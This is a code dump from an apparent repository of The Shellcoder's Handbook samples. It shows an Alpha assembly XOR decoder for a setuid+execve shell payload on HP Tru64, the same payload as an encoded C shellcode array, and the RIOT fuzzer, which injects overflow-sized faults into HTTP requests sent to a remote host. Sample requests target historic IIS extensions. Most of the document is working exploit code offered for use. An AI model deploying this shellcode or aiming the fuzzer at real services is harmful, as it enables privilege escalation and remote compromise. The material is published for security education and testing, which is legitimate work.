-4(a0) #2nd run: overwrite the following bsr instruction with imb. 35 | addq a0, 48, a2 36 | stl a1, -4(a2) #also overwrite the 0x41414141 with the imb instruction 37 | #thus avoiding i-cache incoherency af-ter the decode process 38 | #since imb instruction also have NULL bytes this is the only #way to avoid NULL bytes in decoder loop. 39 | 40 | bsr a0, back #branch the label back saving pc in a0 register. 41 | #on the second run bsr will be over-written with nop. 42 | #execution will continue with the next instruction. 43 | addq a0, 52, a4 #offset to xored data plus four. 44 | addq zero, 60, a3 #size of xored data in bytes. 45 | #Changed according to the size of the setuid+execve pay-load 46 | 47 | addq a0, 112, a5 #offset to xor key; equals to xordata size plus 52. 48 | addq a0, 48, a0 #a0 should point to the first instruc-tion of the xored data 49 | #real shellcode should be expecting it this way. 50 | 51 | ldl a1, -4(a5) #load the xor key. 52 | xorloop: 53 | ldl a2, -4(a4) #load a single long from the xored data. 54 | xor a2, a1, a2 #xor/decrypt the long. 55 | stl a2, -4(a4) #store the long back into its loca-tion. 56 | subq a3, 4, a3 #decrement counter. 57 | addq a4, 4, a4 #increment xored data pointer, move to next long. 58 | bne a3, xorloop #branch back to xorloop till counter is zero. 59 | .long 0x41414141 #this long will be overwriten with the imb instruction. 60 | #flush I-cache. 61 | .long 0xcf497996 62 | .long 0xca8e9c85 63 | .long 0x3d368888 64 | .long 0xcb6a7c88 65 | .long 0x3f768880 66 | .long 0xcf778c98 67 | .long 0x8888880b 68 | .long 0xcf568c99 69 | .long 0xcd258c98 70 | .long 0xcf778c9a 71 | .long 0xcb6ffc88 72 | .long 0x8888880b 73 | .long 0xe1eaa7a7 74 | .long 0xe0fba7e6 75 | .long 0x88888888 76 | 77 | .long 0x88888888 #XOR key. 78 | .end main 79 | -------------------------------------------------------------------------------- /Chapter_12/Shellcoders12sampleprogram07.txt: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 13: HP Tru64 Unix Exploitation 10 | Sample Program #7 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | 17 | unsigned int shellcode[] = 18 | { 19 | 0x221efc18, 20 | 0x42061412, 21 | 0x47f0d411, 22 | 0xb230fffc, 23 | 0xb232fffc, 24 | 0xd21ffffb, 25 | 0x420e1415, 26 | 0x42069414, 27 | 0x43e79413, 28 | 0xa235fffc, 29 | 0x42061410, 30 | 0xa254fffc, 31 | 0x42609533, 32 | 0x46510812, 33 | 0xb254fffc, 34 | 0x42809414, 35 | 0xf67ffffa, 36 | 0x41414141, 37 | 0xcf497996, 38 | 0xca8e9c85, 39 | 0x3d368888, 40 | 0xcb6a7c88, 41 | 0x3f768880, 42 | 0xcf778c98, 43 | 0x8888880b, 44 | 0xcf568c99, 45 | 0xcd258c98, 46 | 0xcf778c9a, 47 | 0xcb6ffc88, 48 | 0x8888880b, 49 | 0xe1eaa7a7, 50 | 0xe0fba7e6, 51 | 0x88888888, 52 | 0x88888888 53 | }; 54 | 55 | 56 | int 57 | main() 58 | { 59 | unsigned char buf[sizeof(shellcode)+1]; 60 | int i; 61 | 62 | printf("sizeof shellcode %d\n", sizeof(xor_connbacksc)); 63 | memcpy(buf, shellcode, sizeof(shellcode)); 64 | 65 | for(i =0 ; i < sizeof(shellcode); i++) { 66 | if( !((i) % 4)) 67 | printf("\"\n\""); 68 | printf("\\x%.2x", buf[i]); 69 | } 70 | printf("\n"); 71 | } 72 | 73 | -------------------------------------------------------------------------------- /Chapter_14/bin/RIOT.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_14/bin/RIOT.exe -------------------------------------------------------------------------------- /Chapter_14/bin/faultmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_14/bin/faultmon.exe -------------------------------------------------------------------------------- /Chapter_14/bin/input_store/1.dat: -------------------------------------------------------------------------------- 1 | GET /search.ida?group=kuroto&q=riot HTTP/1.1 2 | Accept: */* 3 | Accept-Language: en-us 4 | Accept-Encoding: gzip, deflate 5 | User-Agent: Mozilla/4.0 6 | Host: 192.168.1.1 7 | Connection: Keep-Alive 8 | Cookie: ASPSESSIONIDQNNNNTEG=ODDDDIOANNCXXXXIIMGLLNNG 9 | 10 | 11 | -------------------------------------------------------------------------------- /Chapter_14/bin/input_store/2.dat: -------------------------------------------------------------------------------- 1 | GET /eeye.printer?varname=vardat HTTP/1.1 2 | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 3 | Accept-Language: en-us 4 | Accept-Encoding: gzip, deflate 5 | User-Agent: Mozilla/4.0 6 | Host: www.kuroto.na 7 | Connection: Keep-Alive 8 | Cache-Control: no-cache 9 | 10 | -------------------------------------------------------------------------------- /Chapter_14/bin/input_store/3.dat: -------------------------------------------------------------------------------- 1 | GET /eeye.htr?varname=vardat HTTP/1.1 2 | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 3 | Accept-Language: en-us 4 | Accept-Encoding: gzip, deflate 5 | User-Agent: Mozilla/4.0 6 | Host: www.kuruoto.na 7 | Connection: Keep-Alive 8 | Cache-Control: no-cache 9 | 10 | -------------------------------------------------------------------------------- /Chapter_14/src/FaultInject.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "FaultInject.h" 6 | #include "NetIO.h" 7 | 8 | DWORD audit_vuln_class( 9 | struct audit_profile *audit, 10 | 11 | char *gen_request, 12 | 13 | DWORD gen_req_size) 14 | { 15 | DWORD errcode = 0; 16 | 17 | errcode = mod_overflow(audit, gen_request, gen_req_size); 18 | 19 | return(errcode); 20 | } 21 | 22 | DWORD buff_size[] = 23 | { 24 | 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59, 25 | 60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87, 26 | 88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111, 27 | 112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132, 28 | 133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,200,210,237,238,239, 29 | 240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260, 30 | 261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,300,310,400,410,493, 31 | 494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514, 32 | 515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,600,610,700, 33 | 710,800,810,900,910,981,982,983,984,985,986,987,988,989,990,991,992,993,994,995,996, 34 | 997,998,999,1000,1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,1011,1012,1013,1014, 35 | 1015,1016,1017,1018,1019,1020,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031, 36 | 1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1100,1200,1300,1400, 37 | 1500,1600,1700,1800,1900,2000,2010,2029,2030,2031,2032,2033,2034,2035,2036,2037,2038, 38 | 2039,2040,2041,2042,2043,2044,2045,2046,2047,2048,2049,2050,2051,2052,2053,2054,2055, 39 | 2056,2057,2058,2059,2060,2061,2062,2063,2064,2065,2066,2067,2068,2100,3000,3010,3100, 40 | 4000,4010,4077,4078,4079,4080,4081,4082,4083,4084,4085,4086,4087,4088,4089,4090,4091, 41 | 4092,4093,4094,4095,4096,4097,4098,4099,4100,4101,4102,4103,4104,4105,4106,4107,4108, 42 | 4109,4110,4111,4112,4113,4114,4115,4116,5000,5010,5100,6000,6010,6100,7000,7010,7100, 43 | 8000,8010,8100,8173,8174,8175,8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186, 44 | 8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203, 45 | 8204,8205,8206,8207,8208,8209,8210,8211,8212,9000,9010,9100,9200,9300,9400,9500,9600, 46 | 9700,9800,9900,9981,9982,9983,9984,9985,9986,9987,9988,9989,9990,9991,9992,9993,9994, 47 | 9995,9996,9997,9998,9999,10000,10001,10002,10003,10004,10005,10006,10007,10008,10009, 48 | 10010,10011,10012,10013,10014,10015,10016,10017,10018,10019,10020,10100,10200,10300, 49 | 10400,10500,10600,10700,10800,10900,11000,12000,13000,14000,15000,16000,16365,16366, 50 | 16367,16368,16369,16370,16371,16372,16373,16374,16375,16376,16377,16378,16379,16380, 51 | 16381,16382,16383,16384,16385,16386,16387,16388,16389,16390,16391,16392,16393,16394, 52 | 16395,16396,16397,16398,16399,16400,16401,16402,16403,16404,17000,18000,19000,20000, 53 | 32749,32750,32751,32752,32753,32754,32755,32756,32757,32758,32759,32760,32761,32762, 54 | 32763,32764,32765,32766,32767,32768,32769,32770,32771,32772,32773,32774,32775,32776, 55 | 32777,32778,32779,32780,32781,32782,32783,32784,32785,32786,32787,32788,65517,65518, 56 | 65519,65520,65521,65522,65523,65524,65525,65526,65527,65528,65529,65530,65531,65532, 57 | 65533,65534,65535,65536,65537,65538,65539,65540,65541,65542,65543,65544,65545,65546, 58 | 65547,65548,65549,65550,65551,65552,65553,65554,65555,65556,0 59 | }; 60 | 61 | DWORD mod_overflow( 62 | struct audit_profile *audit, 63 | 64 | char *gen_request, 65 | 66 | DWORD gen_req_size) 67 | { 68 | DWORD cur_size = 0, 69 | i = 0, 70 | retcode; 71 | 72 | if(audit->vec.high > gen_req_size || audit->vec.low < 0) 73 | 74 | return(INVALID_VECTOR_RANGE); 75 | 76 | for (i = 0 ; buff_size[i] != 0 ; i++) 77 | { 78 | cur_size=buff_size[i]; 79 | 80 | if((retcode = overflow_engine(audit, gen_request, gen_req_size,cur_size)) == -1) 81 | break; 82 | } 83 | 84 | return(retcode); 85 | } 86 | 87 | 88 | #define OP_VAL +1 89 | #define CL_VAL -1 90 | #define AS_VAL 1 91 | #define DE_VAL +1 92 | 93 | DWORD overflow_engine( struct audit_profile *audit, 94 | 95 | char *gen_request, 96 | 97 | DWORD gen_req_size, 98 | 99 | DWORD buf_size) 100 | { 101 | DWORD shift_pos = 0, 102 | 103 | delim_id = 0, 104 | 105 | send_size = 0, 106 | 107 | fixed_size = 0, 108 | 109 | mod_req_size = 0, 110 | 111 | fault_inj_pos[2] = { 0 , 0 }, 112 | 113 | fault_cnt = 0; 114 | 115 | char *mod_request; 116 | 117 | char fault[MAXBLOCK]; 118 | 119 | mod_req_size = (gen_req_size+MAXBLOCK+FIXUP_PAD); 120 | 121 | mod_request = (char *)calloc(mod_req_size,1); 122 | 123 | for(shift_pos = audit->vec.low; shift_pos < audit->vec.high; shift_pos++) 124 | { 125 | if(!isalpha(gen_request[shift_pos]) && !isdigit(gen_request[shift_pos]) && gen_request[shift_pos] < 0x7F) 126 | { 127 | switch(gen_request[shift_pos]) 128 | { 129 | case '=': 130 | case '-': 131 | case '_': 132 | case '^': 133 | case '&': 134 | case ' ': 135 | case '+': 136 | case ':': 137 | 138 | fault_inj_pos[0] = OP_VAL; 139 | 140 | fault_inj_pos[1] = CL_VAL; 141 | 142 | fault_cnt = 2; 143 | 144 | break; 145 | 146 | case '(': 147 | case '{': 148 | case '[': 149 | case '<': 150 | 151 | fault_inj_pos[0] = OP_VAL; 152 | 153 | fault_cnt = 1; 154 | 155 | break; 156 | 157 | case ')': 158 | case '}': 159 | case ']': 160 | case '>': 161 | 162 | fault_inj_pos[0] = CL_VAL; 163 | 164 | fault_cnt = 1; 165 | 166 | break; 167 | 168 | default: 169 | 170 | fault_inj_pos[0] = DE_VAL; 171 | 172 | fault_cnt = 1; 173 | 174 | break; 175 | } 176 | 177 | for(;fault_cnt > 0;fault_cnt--) 178 | { 179 | memset(fault,gen_request[shift_pos+fault_inj_pos[fault_cnt-1]],buf_size); 180 | 181 | send_size = insert_mod( gen_request, 182 | 183 | gen_req_size, 184 | 185 | mod_request, 186 | 187 | mod_req_size, 188 | 189 | fault, 190 | 191 | buf_size, 192 | 193 | shift_pos+fault_inj_pos[fault_cnt-1] 194 | ); 195 | 196 | if(audit->fixup.active) 197 | { 198 | if((fixed_size = audit->fixup.fixup_func(mod_request,&send_size,mod_req_size)) != NO_FIXUPS) 199 | send_size = fixed_size; 200 | } 201 | 202 | if(initialize_deliver(audit) == -1) 203 | { 204 | fprintf(stderr,"Remote service not responding... \n"); 205 | 206 | return(-1); 207 | } 208 | 209 | fprintf(stderr, 210 | 211 | "Input Size: %05d Offset: %05d Fault Size: %05d\n", 212 | 213 | gen_req_size, 214 | shift_pos+fault_inj_pos[fault_cnt-1], 215 | buf_size, 216 | send_size); 217 | 218 | deliver_data(audit->connected_sock,mod_request,send_size); 219 | 220 | release_deliver(audit); 221 | } 222 | } 223 | } 224 | 225 | return(0); 226 | } 227 | 228 | DWORD insert_mod( char *gen_data, 229 | 230 | DWORD gen_data_size, 231 | 232 | char *mod_data, 233 | 234 | DWORD mod_data_size, 235 | 236 | char *fault_obj, 237 | 238 | DWORD fault_obj_size, 239 | 240 | DWORD inj_pos) 241 | { 242 | DWORD total=0; 243 | 244 | DWORD block_size=0; 245 | 246 | memset(mod_data,0x00,mod_data_size); 247 | 248 | memcpy(mod_data,gen_data,inj_pos); 249 | 250 | memcpy(mod_data+inj_pos,fault_obj,fault_obj_size); 251 | 252 | memcpy(mod_data+inj_pos+fault_obj_size,&gen_data[inj_pos],gen_data_size-inj_pos); 253 | 254 | total = gen_data_size+fault_obj_size; 255 | 256 | return(total); 257 | } 258 | -------------------------------------------------------------------------------- /Chapter_14/src/FaultInject.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define ENGINE_ERROR -1 6 | 7 | #define ENGINE_SHUTDOWN -2 8 | 9 | #define NO_ENGINE_SELECTED -3 10 | 11 | #define FIXUP_ERROR -4 12 | 13 | #define NO_FIXUPS -5 14 | 15 | #define INVALID_VECTOR_RANGE -6 16 | 17 | #define MAXBLOCK 65556 18 | 19 | #define FIXUP_PAD 128 20 | 21 | /* Attack Classes */ 22 | 23 | #define BUFFER_OVERFLOW 1 24 | 25 | typedef int (WINAPI *LPFUNC)(char *,DWORD *,DWORD); 26 | 27 | struct vector 28 | { 29 | BOOL active; 30 | 31 | DWORD low; 32 | 33 | DWORD high; 34 | }; 35 | 36 | /* Post Processing Hooks */ 37 | 38 | struct fixup 39 | { 40 | BOOL active; 41 | 42 | LPFUNC fixup_func; 43 | }; 44 | 45 | struct delivery 46 | { 47 | BOOL active; 48 | 49 | LPFUNC hook; 50 | }; 51 | 52 | /* end hooks */ 53 | 54 | struct audit_profile 55 | { 56 | DWORD audit_type; 57 | 58 | DWORD vuln_class; 59 | 60 | DWORD connected_sock; 61 | 62 | char *host; 63 | 64 | WORD port; 65 | 66 | DWORD input_size; 67 | 68 | char *input_session; 69 | 70 | struct vector vec; 71 | 72 | struct fixup fixup; 73 | }; 74 | 75 | DWORD audit_vuln_class(struct audit_profile *audit, char *gen_request, DWORD gen_req_size); 76 | 77 | DWORD overflow_engine(struct audit_profile *audit, char *gen_request, DWORD gen_req_size,DWORD cur_size); 78 | 79 | DWORD mod_overflow(struct audit_profile *audit, char *gen_request, DWORD gen_req_size); 80 | 81 | DWORD insert_mod(char *gen_data, DWORD gen_data_size, char *mod_data, DWORD mod_data_size, char *fault_obj, DWORD fault_obj_size, DWORD inj_pos); 82 | 83 | DWORD __stdcall fixup_bodydata(char *mod_request, DWORD *mod_req_size,DWORD max_mod_size); 84 | -------------------------------------------------------------------------------- /Chapter_14/src/NetIO.cpp: -------------------------------------------------------------------------------- 1 | #ifndef _WINSOCKAPI_ 2 | #define _WINSOCKAPI_ 3 | #endif 4 | #include 5 | #include 6 | #include 7 | #include 8 | #pragma comment(lib, "ws2_32.lib") 9 | #include "FaultInject.h" 10 | #include "NetIO.h" 11 | 12 | #define NETIO_DEBUG 0 13 | 14 | DWORD tcp_connect( 15 | char *host, 16 | 17 | WORD port) 18 | { 19 | DWORD SockFD = 0; 20 | 21 | DWORD nb_io = 1; 22 | 23 | DWORD option = 0; 24 | 25 | struct linger lin; 26 | 27 | struct sockaddr_in DstSAin; 28 | 29 | BOOL disable_nagle; 30 | 31 | 32 | DstSAin.sin_family = AF_INET; 33 | 34 | DstSAin.sin_port = htons(port); 35 | 36 | DstSAin.sin_addr.s_addr= inet_addr(host); 37 | 38 | if((SockFD = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET) 39 | { 40 | 41 | if(NETIO_DEBUG) 42 | fprintf(stderr, 43 | 44 | "[%08X] Error: Unable to allocate socket\n" 45 | 46 | ,WSAGetLastError()); 47 | 48 | return(-1); 49 | } 50 | 51 | if((WSAConnect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin),NULL,NULL,NULL,NULL)) == SOCKET_ERROR) 52 | { 53 | if(NETIO_DEBUG) 54 | fprintf(stderr, 55 | 56 | "[%08X] Error: Unable to connect to %s:%d\n" 57 | 58 | ,WSAGetLastError(),host,port); 59 | 60 | closesocket(SockFD); 61 | 62 | return(-1); 63 | } 64 | 65 | if((ioctlsocket(SockFD,FIONBIO,&nb_io)) == SOCKET_ERROR) 66 | { 67 | if(NETIO_DEBUG) 68 | fprintf(stderr, 69 | 70 | "[%08X] Error: Unable to set IO mode of socket %d\n" 71 | 72 | ,WSAGetLastError(),SockFD); 73 | 74 | closesocket(SockFD); 75 | 76 | return(-1); 77 | } 78 | 79 | lin.l_onoff = 1; 80 | 81 | lin.l_linger = 0; 82 | 83 | if((setsockopt(SockFD,SOL_SOCKET,SO_LINGER,(const char *)&lin,sizeof(lin))) == SOCKET_ERROR) 84 | { 85 | if(NETIO_DEBUG) 86 | fprintf(stderr, 87 | 88 | "[%08X] Error: Unable to set socket option SO_LINGER on socket %d\n" 89 | 90 | ,WSAGetLastError(),SockFD); 91 | 92 | closesocket(SockFD); 93 | 94 | return(-1); 95 | } 96 | 97 | disable_nagle = TRUE; 98 | 99 | if((setsockopt(SockFD,IPPROTO_TCP,TCP_NODELAY,(const char *)&disable_nagle,sizeof(disable_nagle))) == SOCKET_ERROR) 100 | { 101 | if(NETIO_DEBUG) 102 | fprintf(stderr, 103 | 104 | "[%08X] Error: Unable to set socket option TCP_NODELAY on socket %d\n" 105 | 106 | ,WSAGetLastError(),SockFD); 107 | 108 | closesocket(SockFD); 109 | 110 | return(-1); 111 | } 112 | 113 | return(SockFD); 114 | } 115 | 116 | DWORD GetData( 117 | DWORD SockFD, 118 | 119 | char *buffer, 120 | 121 | DWORD read_size 122 | ) 123 | { 124 | WSABUF wsrecv_buff; 125 | 126 | DWORD bytes_recv = 0; 127 | 128 | DWORD t = 0; 129 | 130 | DWORD Flags = 0; 131 | 132 | DWORD errcode = 0; 133 | 134 | BOOL data_start = FALSE; 135 | 136 | struct timeval read_timeing; 137 | 138 | fd_set readfs; 139 | 140 | 141 | FD_ZERO(&readfs); 142 | 143 | FD_SET(SockFD, &readfs); 144 | 145 | wsrecv_buff.len = read_size; 146 | 147 | wsrecv_buff.buf = buffer; 148 | 149 | read_timeing.tv_sec = 0; 150 | 151 | read_timeing.tv_usec = 100; 152 | 153 | if((t = select(SockFD, NULL, &readfs, NULL, &read_timeing)) == SOCKET_ERROR) 154 | { 155 | if(NETIO_DEBUG) 156 | fprintf(stderr, 157 | 158 | "[%08X] Select: Unable to determine status of socket %d\n", 159 | 160 | WSAGetLastError(),SockFD); 161 | 162 | return(READ_ERROR); 163 | } 164 | 165 | if (FD_ISSET(SockFD,&readfs)) 166 | { 167 | if(errcode = WSARecv(SockFD,&wsrecv_buff,1,&bytes_recv,&Flags,0,0)) 168 | { 169 | errcode = GetLastError(); 170 | 171 | if( errcode == WSAENOTCONN || 172 | errcode == WSAECONNRESET || 173 | errcode == WSAETIMEDOUT || 174 | errcode == WSAECONNABORTED ) 175 | 176 | return(READ_ERROR); 177 | 178 | if(errcode == WSAEWOULDBLOCK) 179 | 180 | return READ_NODATA; 181 | } 182 | 183 | if(bytes_recv > 0) 184 | { 185 | buffer[bytes_recv-1]='\0'; 186 | 187 | return 0; 188 | } 189 | else 190 | { 191 | if(errcode) 192 | return READ_ERROR; 193 | else 194 | return READ_TIMEOUT; 195 | } 196 | } else 197 | { 198 | return(READ_ERROR); 199 | } 200 | } 201 | 202 | DWORD SendData( 203 | DWORD SockFD, 204 | 205 | char *data, 206 | 207 | DWORD data_size) 208 | { 209 | WSABUF send_buff; 210 | 211 | DWORD bytes_sent; 212 | 213 | DWORD rc = 0; 214 | 215 | DWORD t = 0; 216 | 217 | DWORD errcode = 0; 218 | 219 | fd_set writefs; 220 | 221 | struct timeval write_timeing; 222 | 223 | 224 | FD_ZERO(&writefs); 225 | 226 | FD_SET(SockFD, &writefs); 227 | 228 | write_timeing.tv_sec = 1; 229 | 230 | write_timeing.tv_usec = 0; 231 | 232 | send_buff.len = data_size; 233 | 234 | send_buff.buf = data; 235 | 236 | if((t = select(SockFD, NULL, &writefs, NULL, &write_timeing)) == SOCKET_ERROR) 237 | { 238 | if(NETIO_DEBUG) 239 | fprintf(stderr, 240 | 241 | "[%08X] Select: Unable to determine status of socket %d\n" 242 | 243 | ,WSAGetLastError(),SockFD); 244 | 245 | return(WRITE_ERROR); 246 | } 247 | 248 | if (FD_ISSET(SockFD,&writefs)) 249 | { 250 | if(WSASend(SockFD,&send_buff,1,&bytes_sent,0,0,0)) 251 | { 252 | errcode = GetLastError(); 253 | 254 | if(errcode == WSAENOTCONN || errcode == WSAECONNRESET || errcode == WSAETIMEDOUT || errcode == WSAECONNABORTED || errcode == WSAENOTSOCK) 255 | { 256 | if(NETIO_DEBUG) 257 | fprintf(stderr, 258 | 259 | "[%08X] Error: Unable to determine status of socket %d\n" 260 | 261 | ,errcode,SockFD); 262 | 263 | return(WRITE_ERROR); 264 | } 265 | } 266 | } 267 | 268 | return rc; 269 | } 270 | 271 | DWORD initialize_deliver( struct audit_profile *audit ) 272 | { 273 | if((audit->connected_sock = tcp_connect(audit->host, audit->port)) == -1) 274 | { 275 | if(NETIO_DEBUG) 276 | fprintf(stderr, 277 | 278 | "[%08X] Error: Failed to make TCP connection to remote service\n" 279 | 280 | ,audit->connected_sock); 281 | 282 | return(-1); 283 | } 284 | 285 | return(0); 286 | } 287 | 288 | DWORD release_deliver( struct audit_profile *audit ) 289 | { 290 | closesocket(audit->connected_sock); 291 | 292 | return(0); 293 | } 294 | 295 | DWORD deliver_data(DWORD SockFD, char *data,DWORD data_size) 296 | { 297 | char recv_buffer[1024]; 298 | 299 | if(SendData(SockFD, data,data_size) == -1) 300 | return(-1); 301 | 302 | GetData(SockFD,(char *)&recv_buffer,sizeof(recv_buffer)-1); 303 | 304 | return(0); 305 | } 306 | -------------------------------------------------------------------------------- /Chapter_14/src/NetIO.h: -------------------------------------------------------------------------------- 1 | #define SOCK_ERROR -1 2 | 3 | #define CONN_ERROR -2 4 | 5 | #define READ_ERROR -3 6 | 7 | #define READ_TIMEOUT -4 8 | 9 | #define READ_NODATA -5 10 | 11 | #define WRITE_ERROR -6 12 | 13 | 14 | DWORD initialize_deliver(struct audit_profile *audit); 15 | 16 | DWORD release_deliver(struct audit_profile *audit); 17 | 18 | DWORD deliver_data(DWORD SockFD, char *data,DWORD data_size); 19 | 20 | DWORD tcp_connect(char *target, WORD port); 21 | 22 | DWORD GetData(DWORD SockFD,char *buffer,DWORD read_size); 23 | 24 | DWORD SendData(DWORD SockFD, char *data,DWORD data_size); 25 | -------------------------------------------------------------------------------- /Chapter_14/src/RIOT.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "FaultInject.h" 5 | #include "NetIO.h" 6 | 7 | int main(int argc, char **argv) 8 | { 9 | struct audit_profile audit; 10 | 11 | HANDLE resp_file; 12 | 13 | DWORD resp_filesize = 0, 14 | 15 | filesize_high = 0, 16 | 17 | msg_size = 0, 18 | 19 | bytes_read = 0, 20 | 21 | count = 0, 22 | 23 | retcode = 0, 24 | 25 | id = 0; 26 | 27 | char resp_filename[256]; 28 | 29 | char *resp; 30 | 31 | WSADATA wsaData; 32 | 33 | if(argc != 3) 34 | { 35 | fprintf(stderr, 36 | 37 | "\n" 38 | "RIOT v0.1 - SWIFI example for Shellcoders Handbook\n" 39 | "Riley Hassell \n" 40 | "----------------------------------------------------------\n" 41 | "Usage: %s \n" 42 | "\n" 43 | 44 | ,argv[0],argv[0]); 45 | return(-1); 46 | } 47 | 48 | audit.host = argv[1]; 49 | 50 | audit.port = atoi(argv[2]); 51 | 52 | /* 53 | * FIXUPS 54 | * 55 | * Sometimes when inject faults we may compromise the intregity of 56 | * of our input data. Checksums, length fields, as well as other 57 | * characteristics of the data that guarantee must be "fixed". 58 | * 59 | * To solve these issues we can create a "fixup" function that when 60 | * supplied will recalculate neccessary checkums and lengths and store 61 | * them in their appropriate field within the packet. 62 | * 63 | */ 64 | 65 | audit.fixup.active = TRUE; 66 | 67 | audit.fixup.fixup_func = (LPFUNC)fixup_bodydata; 68 | 69 | /* 70 | * Initiallize Winsock interface 71 | */ 72 | 73 | if (WSAStartup(MAKEWORD(2,1), &wsaData) != 0) 74 | { 75 | fprintf(stderr, "[%08X] Error: WSAStartup failed\n",GetLastError()); 76 | ExitProcess(-1); 77 | } 78 | 79 | /* 80 | * RETRIEVE INPUT 81 | * 82 | * We will iterate through each test input located in our "input_store" 83 | * directory. Our input files should be named numerically starting at "1." 84 | * So if we had 3 test inputs then their fielnames would be: 85 | * 86 | * 1.dat 87 | * 2.dat 88 | * 3.dat 89 | * 90 | * Our testing ends when Createfile() fails to open a nonexistent test input 91 | * file. For example: If we had 3 test inputs and 4.dat did not exist, then 92 | * RIOT would cleanup and exit. 93 | * 94 | */ 95 | 96 | for( id = 1 ;; id++ ) 97 | { 98 | memset(&resp_filename,0x00,sizeof(resp_filename)); 99 | 100 | _snprintf(resp_filename, sizeof(resp_filename)-1,"input_store\\%d.dat",id); 101 | 102 | resp_filename[sizeof(resp_filename)-1] = 0; 103 | 104 | if((resp_file = CreateFile(resp_filename,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0)) == INVALID_HANDLE_VALUE) 105 | { 106 | fprintf(stderr,"[%08X] Error: Unable to open file \"%s\"\n",GetLastError(),resp_filename); 107 | 108 | break; 109 | } 110 | 111 | resp_filesize = 0; 112 | 113 | filesize_high = 0; 114 | 115 | if((resp_filesize = GetFileSize(resp_file,&filesize_high)) == INVALID_FILE_SIZE) 116 | { 117 | fprintf(stderr,"[%08X] Error: Unable to query filesize\n",GetLastError()); 118 | 119 | break; 120 | } 121 | 122 | resp = (char *)calloc(resp_filesize+1,1); 123 | 124 | if(!ReadFile(resp_file,resp,resp_filesize,&bytes_read,NULL)) 125 | { 126 | fprintf(stderr,"[%08X] Error: Unable to read input data from %s\n",GetLastError(),resp_filename); 127 | 128 | break; 129 | } 130 | 131 | if(!CloseHandle(resp_file)) 132 | { 133 | fprintf(stderr,"[%08X] Error: Unable to close msg handle\n",GetLastError()); 134 | 135 | break; 136 | } 137 | 138 | audit.vec.active = TRUE; 139 | 140 | audit.vec.low = 0; 141 | 142 | audit.vec.high = bytes_read; 143 | 144 | audit.fixup.active = TRUE; 145 | 146 | audit.fixup.fixup_func = (LPFUNC)fixup_bodydata; 147 | 148 | if(audit_vuln_class(&audit,resp,bytes_read) == -1) 149 | { 150 | fprintf(stderr,"Audit Aborted\n"); 151 | break; 152 | } 153 | 154 | free(resp); 155 | } 156 | 157 | fprintf(stderr,"Audit Complete\n"); 158 | 159 | return(0); 160 | } 161 | 162 | DWORD __stdcall fixup_bodydata( 163 | char *mod_request, 164 | 165 | DWORD *mod_req_size, 166 | 167 | DWORD max_mod_size) 168 | { 169 | DWORD bodydata_size = 0, 170 | 171 | conlen_size = 0, 172 | 173 | new_conlen_size = 0, 174 | 175 | new_session_size = 0, 176 | 177 | test = 0, 178 | 179 | x = 0; 180 | 181 | char *datastart, 182 | 183 | *postdata, 184 | 185 | *pcon_len, 186 | 187 | *conlen_end; 188 | 189 | char conlenbuffer[30]; 190 | 191 | if( (*mod_req_size + 128) > max_mod_size ) 192 | return(NO_FIXUPS); 193 | 194 | if((datastart = strstr(mod_request, "\r\n\r\n")) == NULL) 195 | return(NO_FIXUPS); 196 | 197 | datastart += 4; 198 | 199 | /* Get size of body data */ 200 | bodydata_size = *mod_req_size - (datastart - mod_request); 201 | 202 | /* Find Content-Length: */ 203 | if((pcon_len = strstr(mod_request,"Content-Length:")) == NULL) 204 | return(NO_FIXUPS); 205 | 206 | postdata = (char *)malloc(bodydata_size+1); 207 | 208 | if(postdata == NULL) 209 | { 210 | return(NO_FIXUPS); 211 | exit(-1); 212 | } 213 | 214 | memset(mod_request,0x00,bodydata_size+1); 215 | 216 | memcpy(mod_request,datastart,bodydata_size); 217 | 218 | if((conlen_end = strstr(pcon_len,"\r\n")) == NULL) 219 | return(NO_FIXUPS); 220 | 221 | conlen_size = (conlen_end - pcon_len); 222 | 223 | new_conlen_size = _snprintf(conlenbuffer,30-1,"Content-Length: %d",bodydata_size); 224 | 225 | if((test = new_conlen_size-conlen_size)<0) 226 | return(NO_FIXUPS); 227 | 228 | memmove(conlen_end+test,conlen_end,bodydata_size); 229 | 230 | 